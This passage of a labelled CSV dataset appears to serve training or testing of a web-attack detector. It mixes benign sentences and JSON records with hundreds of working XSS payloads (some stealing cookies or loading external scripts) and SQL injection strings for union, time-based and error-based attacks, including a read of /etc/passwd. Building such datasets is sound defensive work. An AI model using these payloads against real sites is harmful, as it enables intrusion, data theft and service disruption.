ondrop=alert(1) contenteditable>drop here</video>",1,XSS,1163 "-7744"" ) ) ) union all select 9408,9408,9408,9408--",2,SQLi,18315 "{""id"":null,""firstName"":""Jaylen"",""lastName"":""Chuan"",""address"":""HDB Jurong 703 Jurong West Street 71 #01-108"",""city"":""99"",""telephone"":""4941802826""}",3,normal,27347 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></td>",1,XSS,289 "1'|| ( select 'votg' where 5105 = 5105 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13674 1 ) where 9708 = 9708,2,SQLi,21691 "1'+ ( select 'pvej' where 4496 = 4496 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) +'",2,SQLi,10092 "-3316%"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""%"" = """,2,SQLi,10704 "1' where 2025 = 2025 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12474 Select movie.,3,normal,23096 "<BGSOUND SRC=""javascript:alert('');"">",1,XSS,8684 "<div draggable=""true"" contenteditable>drag me</div><input ondrop=alert(1) contenteditable>drop here</input>",1,XSS,1172 Select your iCloud account in the pane on the left.,3,normal,25571 1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( 'gegg' = 'gegg,2,SQLi,10398 Click your account's profile photo and select Settings on the Chromebook.,3,normal,26278 "1"" ) where 4112 = 4112",2,SQLi,21473 "><s%2b""cript>alert(document.cookie)</script>",1,XSS,6795 Select your picture.,3,normal,24983 select case when 6558 = 4327 then 1 else null end--,2,SQLi,18267 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></tr>",1,XSS,279 ORDER BY 8--,2,SQLi,22302 "-5097' ) union all select 8992,8992,8992,8992,8992,8992,8992,8992,8992--",2,SQLi,15970 Modify the document format.,3,normal,22632 <form action=javascript:alert(1)><input type=submit value=XSS>,1,XSS,3123 "<dl onmouseleave=""alert(1)"">test</dl>",1,XSS,8582 "1' in boolean mode ) and make_set ( 8403 = 8403,8899 ) #",2,SQLi,17719 "1"" ) ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,17440 <div onpointerenter=alert(1)>XSS</div>,1,XSS,8342 <picture id=x tabindex=1 onbeforeactivate=alert(1)></picture>,1,XSS,3408 "-1641'|| ( select 'jfnu' where 7682 = 7682 union all select 7682,7682,7682--",2,SQLi,15499 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ""%"" = """,2,SQLi,13885 Select your dream honeymoon destination.,3,normal,24375 "1' ) where 3450 = 3450 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13152 "<style>:target {color:red;}</style><picture id=x style=""transition:color 1s"" ontransitionend=alert(1)></picture>",1,XSS,933 "<style>:target {color: red;}</style><blockquote id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></blockquote>",1,XSS,693 or sleep 5,2,SQLi,22430 <section onpointerenter=alert(1)>XSS</section>,1,XSS,6366 select case when 5559 = 3483 then 1 else null end--,2,SQLi,18317 <h1 onpointerdown=alert(1)>XSS</h1>,1,XSS,9024 -7207' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'obxw' = 'obxw,2,SQLi,10297 -7772' ) ) or 9323 = 9323#,2,SQLi,20980 "{""id"":null,""firstName"":""Yan Feng"",""lastName"":""Yee"",""address"":""39 Stamford Rd #01-07"",""city"":""181"",""telephone"":""802264725""}",3,normal,26873 "1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;",2,SQLi,16452 "1"" ) ) ) union all select null--",2,SQLi,20347 <button onLoad=javascript:alert(1)>,1,XSS,9144 <output onpointerdown=alert(1)>XSS</output>,1,XSS,7111 <button onStart=javascript:alert(1)>,1,XSS,8978 "<output onkeyup=""alert(1)"" contenteditable>test</output>",1,XSS,4321 <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>,1,XSS,2967 "<frame onbeforecut=""alert(1)"" contenteditable>test</frame>",1,XSS,3971 "<rt draggable=""true"" ondragstart=""alert(1)"">test</rt>",1,XSS,4928 ORDER BY 15#,2,SQLi,22309 "1 where 4319 = 4319 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14640 select ( case when ( 2968 = 2021 ) then 1 else 2968* ( select 2968 from master..sysdatabases ) end ) --,2,SQLi,13995 1' ) as sagj where 4558 = 4558,2,SQLi,20569 "<article draggable=""true"" ondragenter=""alert(1)"">test</article>",1,XSS,3094 "1%"" ) ) and 7358 = 6986--",2,SQLi,21127 "1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'rtbm' = 'rtbm",2,SQLi,12772 Specify conditions where useful.,3,normal,23376 "1%' or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15814 "1' in boolean mode ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) #",2,SQLi,12539 "<img src=""x:gif"" onerror=""window['al\u0065rt'](0)""></img>",1,XSS,3984 or sleep(5)#,2,SQLi,22325 "<style>@keyframes x{}</style><noframes style=""animation-name:x"" onanimationend=""alert(1)""></noframes>",1,XSS,1406 "-3445 union all select 5505,5505,5505--",2,SQLi,19603 "<h1 oncopy=""alert(1)"" contenteditable>test</h1>",1,XSS,6126 "<div draggable=""true"" contenteditable>drag me</div><applet ondrop=alert(1) contenteditable>drop here</applet>",1,XSS,1096 "1 ) where 7485 = 7485 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,17377 "-5573' ) union all select 2866,2866,2866,2866,2866,2866,2866,2866,2866--",2,SQLi,15996 "<template draggable=""true"" ondragleave=""alert(1)"">test</template>",1,XSS,2845 """)))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,19259 "<legend oncut=""alert(1)"" contenteditable>test</legend>",1,XSS,4817 "1"" ) ) ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16497 "<rt onkeyup=""alert(1)"" contenteditable>test</rt>",1,XSS,5958 Select bistro.,3,normal,24542 1%' ) ) ) and sleep ( 5 ) #,2,SQLi,20884 1 ) order by 1--,2,SQLi,22140 "1%' ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13398 Select open.,3,normal,24603 -8701%' ) ) or ( 4843 = 1690 ) *1690 and ( ( '%' = ',2,SQLi,18197 Select your state.,3,normal,24963 "1"" and elt ( 2373 = 5817,5817 ) and ""rsdt"" = ""rsdt",2,SQLi,18467 "1"" ) ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13203 ORDER BY 30,2,SQLi,22388 "1'+ ( select 'midn' where 2819 = 2819 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) +'",2,SQLi,12229 select case when 4537 = 8418 then 1 else null end--,2,SQLi,18310 "select * from users where id = '1' union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,14431 "<abbr onkeydown=""alert(1)"" contenteditable>test</abbr>",1,XSS,4688 1' where 6359 = 6359 and ( 3020 = 3020 ) *6703--,2,SQLi,18738 "<big draggable=""true"" ondragend=""alert(1)"">test</big>",1,XSS,4924 "-3501' ) ) ) or make_set ( 7122 = 6158,6158 ) and ( ( ( 'mlfl' like 'mlfl",2,SQLi,15857 ><img src=x onerror=javascript:alert((`A`))>,1,XSS,6788 <base id=x tabindex=1 onfocusin=alert(1)></base>,1,XSS,5879 <svg><hr onload=alert(1)></hr>,1,XSS,9551 "select * from users where id = 1 union select @&&@,version ( ) -- 1",2,SQLi,16483 "><h1><IFRAME SRC=# onmouseover=alert(document.cookie)""></IFRAME>123</h1>",1,XSS,2347 "<meter onclick=""alert(1)"">test</meter>",1,XSS,8433 "<keygen oncopy=""alert(1)"" contenteditable>test</keygen>",1,XSS,4588 Select the right paint color for the walls.,3,normal,24071 "select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,14621 "{""id"":null,""name"":""Tepig""}",3,normal,27112 "1"" ) ) order by 1--",2,SQLi,22013 "<dl oncontextmenu=""alert(1)"">test</dl>",1,XSS,8381 Picking select.,3,normal,24783 "1"" ) and elt ( 4249 = 4249,7259 ) and ( ""upkx"" = ""upkx",2,SQLi,17961 Select your fail.,3,normal,25021 "<SCRIPT a=`>` SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,6199 "-8677'|| ( select 'ihpm' from dual where 9571 = 9571 union all select 9571,9571,9571,9571,9571,9571,9571,9571,9571,9571--",2,SQLi,13121 "1'+ ( select 'arzm' where 6464 = 6464 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) ) +'",2,SQLi,14480 "-3865"" ) where 3559 = 3559 union all select 3559,3559,3559,3559,3559,3559,3559--",2,SQLi,15203 "<u onkeyup=""alert(1)"" contenteditable>test</u>",1,XSS,6403 innerHTML=location.hash>#<script>alert(1)</script>,1,XSS,5697 <dfn onfocusout=alert(1) tabindex=1 id=x></dfn><input autofocus>,1,XSS,2943 ORDER BY 23,2,SQLi,22381 "Just want to say thankyou to amazing selection for. I have a question for the platoon itself tho, what do u prefer?",3,normal,26496 <svg><progress onload=alert(1)></progress>,1,XSS,7384 Select walk.,3,normal,24644 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) # idxq",2,SQLi,18028 "1%' ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13858 <strong id=x tabindex=1 onfocus=alert(1)></strong>,1,XSS,5580 1' ) ) as eltx where 9955 = 9955 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10362 "1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ""exgr"" like ""exgr",2,SQLi,10017 <html onpointerenter=alert(1)>XSS</html>,1,XSS,7908 Sort cables.,3,normal,23041 ORDER BY 18--,2,SQLi,22241 "<style>:target {color: red;}</style><sub id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></sub>",1,XSS,1050 ><img src=x onerror=javascript:alert((`1`))>,1,XSS,6785 "1%' ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( '%' = '",2,SQLi,12686 "Scroll down and select ""Accessibility"" from the third list of items.",3,normal,25705 "or ""1""=""1",2,SQLi,22448 "<style>@keyframes x{}</style><link style=""animation-name:x"" onanimationstart=""alert(1)""></link>",1,XSS,1611 -3748' where 9292 = 9292 or 3337 = 2859#,2,SQLi,19504 "<a href=""javas\x0Ccript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2417 "<a href=""\xE2\x80\xAFjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2019 "<script\x20type=""text/javascript"">javascript:alert(1);</script>",1,XSS,2973 "1"" ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ""uquh"" = ""uquh",2,SQLi,12341 "select * from users where id = '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,14062 "1"" ) ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13591 "<picture onbeforepaste=""alert(1)"" contenteditable>test</picture>",1,XSS,2933 "1 ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15430 Select your alternate.,3,normal,25048 "1 union all select null,null,null,null#",2,SQLi,19654 "-2582'+ ( select ggim where 5346 = 5346 union all select 5346,5346#",2,SQLi,16532 "1%' ) ) and make_set ( 6527 = 9529,9529 ) and ( ( '%' = '",2,SQLi,17514 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#",2,SQLi,13025 <audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>,1,XSS,1816 "1 ) as cfnz where 6065 = 6065 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14610 1' ) where 4867 = 4867 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,14472 did you select the correct one,3,normal,26243 "1'|| ( select 'qrle' from dual where 9239 = 9239 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",2,SQLi,11557 "<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,2125 "1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,13728 cos,3,normal,23218 "{""id"":null,""name"":""GroundLocomon""}",3,normal,27170 "{""id"":null,""name"":""matter from""}",3,normal,26952 "1"" ) ) as tpeh where 6306 = 6306 and 5965 = 5806#",2,SQLi,18605 1 ) ) as zykv where 2158 = 2158,2,SQLi,20460 "select count ( * ) from generate_series ( 1,5000000 ) --",2,SQLi,17624 "<thead onmouseout=""alert(1)"">test</thead>",1,XSS,7704 Select a book for your reading list.,3,normal,24030 "select * from users where id = 1 or "", ) "" = 1 or 1 = 1 -- 1",2,SQLi,17133 "1"" where 3510 = 3510",2,SQLi,21780 "javascript:alert(""hellox worldss"")",1,XSS,9173 "<div draggable=""true"" contenteditable>drag me</div><isindex ondragover=alert(1) contenteditable>drop here</isindex>",1,XSS,810 admin' or 1=1/*,2,SQLi,22144 1' ) and sleep ( 5 ) #,2,SQLi,21469 1 ) and 9198 = 9198--,2,SQLi,21641 Join us tonight for a fantastic dinner.,3,normal,22902 "<thead oncopy=""alert(1)"" contenteditable>test</thead>",1,XSS,4908 "<dialog draggable=""true"" ondragend=""alert(1)"">test</dialog>",1,XSS,3724 I have done nothing but select and cut.,3,normal,26075 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( 7240 = 7240",2,SQLi,13146 "1' where 8860 = 8860 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12758 "<ruby onbeforepaste=""alert(1)"" contenteditable>test</ruby>",1,XSS,3964 Select the right playlist for the party.,3,normal,24179 "<script a=`>` SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,2673 1' and 2908 = 8067--,2,SQLi,21869 "<i onmouseup=""alert(1)"">test</i>",1,XSS,9420 "-9039' ) union all select 8058,8058,8058,8058,8058--",2,SQLi,18172 <isindex type=image onload=alert(1) src=validimage.png>,1,XSS,4554 "-9281 ) where 8363 = 8363 or make_set ( 8220 = 5127,5127 ) --",2,SQLi,17015 "<th onpaste=""alert(1)"" contenteditable>test</th>",1,XSS,6011 "select * from users where id = 1 or ""%{"" or 1 = 1 -- 1",2,SQLi,17855 1 ) where 4548 = 4548 and 9198 = 9198--,2,SQLi,19625 "<SCRIPT a="">'>"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,5739 "<sub onmousedown=""alert(1)"">test</sub>",1,XSS,8482 "1 ) where 8630 = 8630 union all select null,null--",2,SQLi,18461 <mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus>,1,XSS,3166 Update the software package to the latest version.,3,normal,22977 "<img\x47src=x onerror=""javascript:alert(1)"">",1,XSS,6766 Now the majestic soprano Jessye Norman is joining their select ranks.,3,normal,25864 "<style>@keyframes x{}</style><abbr style=""animation-name:x"" onanimationend=""alert(1)""></abbr>",1,XSS,1659 Click to start the upstroke Click on the upstroke to select the POWER level of the shot.,3,normal,26279 -3582' ) or 6872 = 6872 and ( 'gyfj' = 'gyfj,2,SQLi,19118 "<isindex onclick=""alert(1)"">test</isindex>",1,XSS,7552 "<main onbeforecut=""alert(1)"" contenteditable>test</main>",1,XSS,4268 Select your preferred search engine from the list that appears.,3,normal,25568 "-3829%"" ) union all select 2218,2218,2218,2218,2218,2218,2218--",2,SQLi,16830 "{""id"":null,""firstName"":""Krish"",""lastName"":""Muthukumarasamy"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27081 `'><script>\xE2\x80\xA9javascript:alert(1)</script>,1,XSS,5318 <img src/onerror=alert(1)>,1,XSS,9676 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4",2,SQLi,19253 1 ) ) as rroe where 4840 = 4840,2,SQLi,20475 "Rokke, a former US army colonel, also briefed the Commons Defense Select Committee on the risks of DU in 1999.",3,normal,25744 "<style>:target {color: red;}</style><mark id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></mark>",1,XSS,1003 "ABC<div style=""x:expression\x00(javascript:alert(1)"">DEF",1,XSS,4200 "<script>if(""x\\xEE\xA9\x93"".length==2) { javascript:alert(1);}</script>",1,XSS,2420 "<noscript draggable=""true"" ondrag=""alert(1)"">test</noscript>",1,XSS,3577 "1"" ) ) as brwj where 9180 = 9180",2,SQLi,20255 1'+ ( select 'njee' where 4101 = 4101 and 3090 = 7873 ) +',2,SQLi,17369 <script>alert(1)<!–,1,XSS,9775 "<image onbeforepaste=""alert(1)"" contenteditable>test</image>",1,XSS,3560 or 1 = 1 or '' = ',2,SQLi,22037 "1'+ ( select ttae where 4601 = 4601 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) ) +'",2,SQLi,12482 <dd onblur=alert(1) tabindex=1 id=x></dd><input autofocus>,1,XSS,3856 "<sub onkeypress=""alert(1)"" contenteditable>test</sub>",1,XSS,4889 "-6766"" where 6591 = 6591 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,17165 "1 ) ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13082 Select your swap.,3,normal,25053 `'><script>\xE2\x80\xAFjavascript:alert(1)</script>,1,XSS,5315 "1 where 1992 = 1992 union all select null,null--",2,SQLi,18692 ))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337,2,SQLi,16247 Specify filters where applicable.,3,normal,23251 "<rtc draggable=""true"" ondragenter=""alert(1)"">test</rtc>",1,XSS,4526 "1 ) ) as rbae where 2049 = 2049 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13723 "<track onpaste=""alert(1)"" contenteditable>test</track>",1,XSS,4829 ‘ or 3 = 3 --,2,SQLi,22038 "<style>:target {color: red;}</style><strong id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></strong>",1,XSS,809 "<caption onpaste=""alert(1)"" contenteditable>test</caption>",1,XSS,3909 "1' in boolean mode ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) #",2,SQLi,14357 1' ) order by 1#,2,SQLi,22139 "<p oncut=""alert(1)"" contenteditable>test</p>",1,XSS,7026 <fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus>,1,XSS,1958 1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'ukzb' = 'ukzb,2,SQLi,10661 <br onpointerup=alert(1)>XSS</br>,1,XSS,9346 "1"" ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ""vxec"" like ""vxec",2,SQLi,15185 "1 ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,11428 Randomly select now.,3,normal,24785 <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>,1,XSS,2404 "<param oncut=""alert(1)"" contenteditable>test</param>",1,XSS,5186 "1%' union all select null,null,null,null,null,null,null--",2,SQLi,17481 "-1949"" ) ) as urke where 8761 = 8761 union all select 8761,8761,8761,8761,8761,8761,8761#",2,SQLi,14722 Exela Technologies will be listed on the Nasdaq Global Select Market.,3,normal,26210 Thus it is possible to select a comparator from a different company in the same corporate group.,3,normal,25295 "1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'fmkz' like 'fmkz",2,SQLi,10307 "1%' ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( '%' = '",2,SQLi,12743 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>,1,XSS,8098 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23",2,SQLi,9894 Let's decide where to go for a hike.,3,normal,23701 select case when 3819 = 1887 then 1 else null end--,2,SQLi,18347 Where can I select a gift for my nephew?,3,normal,23744 "-5317' ) ) union all select 7673,7673,7673,7673,7673,7673#",2,SQLi,17411 1 ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( 3332 = 3332,2,SQLi,15110 "iif ( 2869 = 9448,1,1/0 )",2,SQLi,21084 Where's the party?,3,normal,23489 <image src=validimage.png onload=alert(1)>,1,XSS,7569 "1"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""bmbg"" like ""bmbg",2,SQLi,11150 "1'+ ( select jley where 3581 = 3581 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14743 "As well as the joint Work and Pensions Select Committee and Business, Innovations, and Skills Select Committee inquiry, the BHS collapse is being probed by the Serious Fraud Office and the Insolvency Service.",3,normal,26350 <figcaption onpointerdown=alert(1)>XSS</figcaption>,1,XSS,5370 "<table oncontextmenu=""alert(1)"">test</table>",1,XSS,6931 [a](javascript:this;alert(1)),1,XSS,9606 ORDER BY 18,2,SQLi,22376 <hr onpointerenter=alert(1)>XSS</hr>,1,XSS,8904 1' where 2958 = 2958,2,SQLi,21884 "1' in boolean mode ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11819 "1 ) ) union all select null,null,null,null,null,null,null#",2,SQLi,17393 "1%' and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and '%' = '",2,SQLi,11292 "<strong onmouseup=""alert(1)"">test</strong>",1,XSS,7387 He ordered a pepperoni pizza for lunch.,3,normal,22899 Select a book to read on the journey.,3,normal,24066 -6984 order by 1#,2,SQLi,22102 "{""id"":null,""name"":""Kakuna""}",3,normal,26767 "<dl onclick=""alert(1)"">test</dl>",1,XSS,9463 "<FRAMESET><FRAME SRC=""javascript:document.vulnerable=true;""></frameset>",1,XSS,2464 "They speedily relapsed into crime; their numbers, as the years passed, became so great and their depredations so serious, especially in garrotte robberies, that a cry of indignation was raised against the system, which led to its arraignment before a select committee of the House of Commons in 1863.",3,normal,25311 "-1370' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( 'xmrg' = 'xmrg",2,SQLi,16676 1' or sleep ( 5 ) and 'udqz' = 'udqz,2,SQLi,19988 "1"" and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ""xhvo"" = ""xhvo",2,SQLi,12966 "1%"" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ""%"" = """,2,SQLi,11732 "select * from users where id = 1 union select 1`\`,version ( ) -- 1",2,SQLi,16479 <svg><kbd onload=alert(1)></kbd>,1,XSS,9457 Select dislike.,3,normal,24747 "<sCrIpt/""<a""/srC=data:="".<a,[8].some(confirm)>",1,XSS,6511 1' waitfor delay '0:0:5' and 'vwuz' = 'vwuz,2,SQLi,19229 "Instead, look to select U.S. companies with significant sales in China.",3,normal,25984 "<style>:target {transform: rotate(180deg);}</style><script id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></script>",1,XSS,591 Merge the financial accounts for analysis.,3,normal,22940 "1, ( select ( case when ( 6857 = 7623 ) then 1 else 6857* ( select 6857 from information_schema.character_sets ) end ) )",2,SQLi,13160 "select * from users where id = '1' union select +\,@@VERSION -- 1'",2,SQLi,16573 "<li onmouseover=""alert(1)"">test</li>",1,XSS,8851 "<source oncopy=""alert(1)"" contenteditable>test</source>",1,XSS,4626 "-7202%"" ) ) union all select 2901#",2,SQLi,20166 "<progress onclick=""alert(1)"">test</progress>",1,XSS,6848 "1'|| ( select 'scwx' where 6591 = 6591 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) ||'",2,SQLi,14367 "-9440"" union all select 5599,5599,5599,5599,5599--",2,SQLi,18436 1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) # yoch,2,SQLi,10874 <dt onpointerleave=alert(1)>XSS</dt>,1,XSS,8872 "{""id"":null,""name"":""dream""}",3,normal,27585 <svg><nav onload=alert(1)></nav>,1,XSS,9427 "<blockquote onmouseout=""alert(1)"">test</blockquote>",1,XSS,5456 ORDER BY 3--,2,SQLi,22297 "<style>@keyframes x{}</style><address style=""animation-name:x"" onanimationend=""alert(1)""></address>",1,XSS,1451 ) OR SLEEP(5)#,2,SQLi,22203 "1' in boolean mode ) union all select null,null,null,null,null,null,null#",2,SQLi,15873 "1', ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 9693 = 9693,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,11478 1%',2,SQLi,22547 "-1573"" ) union all select 3928,3928,3928,3928--",2,SQLi,18840 Where's your SQL duty?,3,normal,23432 -5350 ) ) or 9323 = 9323#,2,SQLi,21061 "1 ) where 3915 = 3915 union all select null,null,null,null#",2,SQLi,17304 "\"";alert('');//",1,XSS,9806 "<style>@keyframes x{}</style><title style=""animation-name:x"" onanimationend=""alert(1)""></title>",1,XSS,1589 "<caption ondblclick=""alert(1)"">test</caption>",1,XSS,6689 "1"" ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13582 "-7889"" ) ) as oayf where 1765 